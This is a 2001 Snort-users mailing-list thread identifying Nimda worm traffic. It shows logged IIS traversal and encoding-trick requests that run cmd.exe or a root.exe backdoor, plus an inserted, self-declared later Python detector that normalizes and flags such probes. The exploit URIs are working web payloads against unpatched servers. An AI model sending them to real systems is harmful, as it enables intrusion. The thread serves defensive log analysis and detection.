[Snort-users] Not CodeGreen

Ginnetty, James JGinnetty at ...1561...
Tue Sep 18 13:24:02 EDT 2001


Definitely not our friend Code Red. Our log files are showing just how
pervasive this thing is. Looks like it will try 16 different exploit strings
in an attempt to infect another server before moving on to the next IP. Here
is a sorted cut from one of the logs. It is repeated many times over from
different IPs. No wonder the level of traffic....

  Jim

14:00:43	198.146.11.167	GET	/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/c/winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/d/winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/MSADC/root.exe?/c+dir
14:00:44	198.146.11.167	GET	/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET	/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET	/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET	/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET	/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET	/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET	/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/scripts/root.exe?/c+dir
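
The probe set above hides the same two targets (cmd.exe reached by directory traversal, and the root.exe copy left behind by Code Red II) behind double percent-encoding and overlong UTF-8 separators. The following is an added example, not from the original post or from Snort, that normalizes such URIs and groups the flagged probes per source IP; the log lines it processes are constructed in the same tab-separated layout as the cut above, and the IPs are documentation addresses.

```python
"""Flag Nimda-style IIS probes in tab-separated web log lines (added example)."""
from collections import defaultdict
from urllib.parse import unquote

# Overlong / invalid UTF-8 forms that IIS of the day decoded to a path separator.
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%1c": "\\", "%c1%9c": "\\"}

# Constructed sample (not real traffic): time, source IP, method, URI.
SAMPLE_LOG = """\
14:00:43\t192.0.2.10\tGET\t/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43\t192.0.2.10\tGET\t/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44\t192.0.2.10\tGET\t/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
14:00:44\t192.0.2.10\tGET\t/msadc/..%255c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:44\t192.0.2.10\tGET\t/scripts/root.exe?/c+dir
14:00:45\t192.0.2.10\tGET\t/d/winnt/system32/cmd.exe?/c+dir
14:00:46\t198.51.100.7\tGET\t/index.html
"""

def normalize(uri):
    """Undo overlong UTF-8 and repeated percent-encoding; unify separators to '/'."""
    path = uri.split("?", 1)[0].lower()
    for enc, sep in OVERLONG.items():
        path = path.replace(enc, sep)
    for _ in range(4):                   # %255c -> %5c -> '\' needs two passes
        decoded = unquote(path)
        if decoded == path:              # stop once decoding is stable
            break
        path = decoded
    return path.replace("\\", "/")

def classify(uri):
    """Return a finding label for one request, or None if it looks benign."""
    path = normalize(uri)
    if path.endswith("root.exe"):
        return "root.exe backdoor"        # Code Red II leftover
    if path.endswith("/cmd.exe"):
        if "/../" in path:
            return "cmd.exe via traversal"
        return "cmd.exe via drive mapping"   # /c or /d virtual root
    return None

def scan(log_text):
    """Map each source IP to the set of distinct probe URIs flagged for it."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        _time, ip, _method, uri = line.split("\t", 3)
        if classify(uri):
            hits[ip].add(uri)
    return dict(hits)

if __name__ == "__main__":
    for ip, uris in scan(SAMPLE_LOG).items():
        print(f"{ip}: {len(uris)} distinct probe strings")
```

A source that fires many distinct probe strings within a second is the worm's scanning pattern; a single flagged request from an otherwise quiet host deserves a look but is not the same signal.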

-----Original Message-----
From: bthaler at ...2720... [mailto:bthaler at ...2720...]
Sent: Tuesday, September 18, 2001 3:43 PM
To: snort-users at lists.sourceforge.net
Subject: [Snort-users] Not CodeGreen


For everyone's information:

The inordinate amount of traffic you're most likely seeing today is almost
surely NOT CodeGreen.

CodeGreen was developed as a way to patch servers infected with CodeRed.
What you are most likely seeing is in fact "nimda", which by all accounts seems like the last 3 or 4
big IIS exploits (CodeRed, Unicode, et al.) rolled up into one big exploit.

Again, this is most likely NOT CodeGreen, even though some have referred to
it as that.

BTW, my Snort-1.7 MySQL database has surpassed 1,000,000 records just today,
and is still going strong.  How's that for scalability, baby?

I run Snort-Win32 on one NT SMP machine, and the database from another
machine, so the load gets balanced.

Hats off to Martin R, et al.

Regards,
Brad T.

